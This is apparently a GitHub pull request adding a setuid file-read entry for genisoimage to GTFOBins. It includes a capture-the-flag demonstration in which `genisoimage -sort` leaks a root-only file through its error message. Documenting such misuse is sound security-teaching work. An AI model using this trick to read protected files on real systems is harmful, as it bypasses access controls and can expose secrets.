### PR TITLE
Read $LFILE if genisoimage has the setuid bit

### DIFF
--- a/_gtfobins/genisoimage.md
+++ b/_gtfobins/genisoimage.md
@@ -6,10 +6,9 @@ functions:
         LFILE=file_to_read
         genisoimage -q -o - "$LFILE"
   suid:
-    - description: Read $LFILE if genisoimage has the setuid bit
-      code: |
+    - code: |
         LFILE=file_to_read
-        genisoimage -sort "$LFILE"
+        ./genisoimage -q -o - "$LFILE"
   sudo:
     - code: |
         LFILE=file_to_read

--- a/_gtfobins/genisoimage.md
+++ b/_gtfobins/genisoimage.md
@@ -6,9 +6,10 @@ functions:
         LFILE=file_to_read
         genisoimage -q -o - "$LFILE"
   suid:
-    - code: |
+    - description: The file is parsed, and some of its content is disclosed by the error messages, thus this might not be suitable to read arbitrary data.
+      code: |
         LFILE=file_to_read
-        ./genisoimage -q -o - "$LFILE"
+        ./genisoimage -sort "$LFILE"
   sudo:
     - code: |
         LFILE=file_to_read

--- a/_gtfobins/genisoimage.md
+++ b/_gtfobins/genisoimage.md
@@ -5,6 +5,11 @@ functions:
     - code: |
         LFILE=file_to_read
         genisoimage -q -o - "$LFILE"
+  suid:
+    - description: Read $LFILE if genisoimage has the setuid bit
+      code: |
+        LFILE=file_to_read
+        genisoimage -sort "$LFILE"
   sudo:
     - code: |
         LFILE=file_to_read


### PR DESCRIPTION
If `genisoimage` has the setuid bit set you can read arbitrary files that setuid user can access.

```shell
# Check perms on genisoimage and flag
$ ls -l /usr/bin/genisoimage 
-rwsr-xr-x 1 root root 657304 Feb 18  2020 /usr/bin/genisoimage
$ ls -l /flag
-r-------- 1 root root 56 Dec 17 03:28 /flag

# Read /flag with genisoimage
$ /usr/bin/genisoimage -sort /flag
/usr/bin/genisoimage: Incorrect sort file format
        flag{oof_setuid_can_hurt}
```
```shell
$ genisoimage --version
genisoimage 1.1.11 (Linux)
```

I learned this in program misuse section of pwncollege at [https://dojo.pwn.college/challenges/misuse](https://dojo.pwn.college/challenges/misuse) (Level 23).

